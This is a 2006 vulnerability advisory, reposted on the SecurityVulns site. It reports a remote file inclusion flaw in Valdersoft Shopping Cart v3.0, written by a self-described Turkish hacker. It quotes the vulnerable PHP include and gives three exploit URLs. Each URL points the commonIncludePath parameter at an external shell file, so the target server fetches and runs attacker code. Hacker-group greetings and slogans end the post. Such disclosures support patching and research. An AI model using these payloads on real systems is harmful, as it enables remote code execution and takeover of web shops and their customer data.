Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability

  [SA23388] eyeOS File Upload Vulnerability

  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability

  cwmVote 1.0 File Include Vulnerability

From:bilkopat_(at)_hotmail.com <bilkopat_(at)_hotmail.com>
Date:20 декабря 2006 г.
Subject:Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include

*********************************************************************************
*********************
*Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include*
*********************************************************************************
*********************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
*
+/common_include/common.php , /include/common.php, /admin/include/common.php*
*
*
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+    include ( $commonIncludePath."common.php" );                           *
+                                                                           *
*********************************************************************************
************
+ Exploit  :                                                                                *

+********************************************************************************
************+
+ http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?*+
+********************************************************************************
************+
+ http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*******+
+********************************************************************************
************+
+ http://www.site.***/[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+
+********************************************************************************
************+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++
=================================================================================
=============
?                                                                                  
          *
?                                                                                  
          *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                  
          *
?////////////////////////////////////////////////////////////////////////////////
/////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
*********************************************************************************
*************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.     *
*******************                                                                          *
*********************************************************************************
*************

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород